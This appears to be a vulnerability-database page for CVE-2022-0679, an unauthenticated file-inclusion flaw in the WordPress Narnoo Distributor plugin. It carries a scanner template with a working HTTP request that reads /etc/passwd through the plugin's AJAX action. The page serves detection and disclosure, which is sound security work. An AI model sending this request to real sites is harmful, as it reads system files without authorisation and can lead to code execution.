| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2022-0679 | 28 Mar 202218:15 | – | attackerkb | |
| CVE-2022-0679 | 28 Mar 202222:41 | – | circl | |
| WordPress plugin Narnoo Distributor 路径遍历漏洞 | 28 Mar 202200:00 | – | cnnvd | |
| WordPress Narnoo Distributor plugin path traversal vulnerability | 30 Mar 202200:00 | – | cnvd | |
| CVE-2022-0679 | 28 Mar 202217:23 | – | cve | |
| CVE-2022-0679 Narnoo Distributor <= 2.5.1 - Unauthenticated LFI to Arbitrary File Read / RCE | 28 Mar 202217:23 | – | cvelist | |
| CVE-2022-0679 | 28 Mar 202218:15 | – | nvd | |
| CVE-2022-0679 | 28 Mar 202218:15 | – | osv | |
| WordPress Narnoo Distributor plugin <= 2.5.1 - Unauthenticated Local File Inclusion (LFI) vulnerability leading to Arbitrary File Read / RCE | 1 Mar 202200:00 | – | patchstack | |
| Design/Logic Flaw | 28 Mar 202218:15 | – | prion |
id: CVE-2022-0679
info:
name: WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion
author: Veshraj
severity: critical
description: |
WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.
impact: |
The vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
remediation: |
Update to the latest version of the WordPress Narnoo Distributor plugin (>=2.5.2) to mitigate the LFI vulnerability.
reference:
- https://wpscan.com/vulnerability/0ea79eb1-6561-4c21-a20b-a1870863b0a8
- https://nvd.nist.gov/vuln/detail/CVE-2022-0679
- https://github.com/cyllective/CVEs
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0679
cwe-id: CWE-22
epss-score: 0.4783
epss-percentile: 0.98703
cpe: cpe:2.3:a:narnoo_distributor_project:narnoo_distributor:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: narnoo_distributor_project
product: narnoo_distributor
framework: wordpress
tags: cve,cve2022,narnoo-distributor,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi,narnoo_distributor_project,vkev,vuln
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=narnoo_distributor_lib_request&lib_path=/etc/passwd
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402200a0ffdd0c089d4f22da76fdf7c56bfc9fe0898e82376e8bcc959d40e8478d1e5022065a98b70112488d52e2b0ae8c5c7969bb5fe6e96f946398549726d5807c14740:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation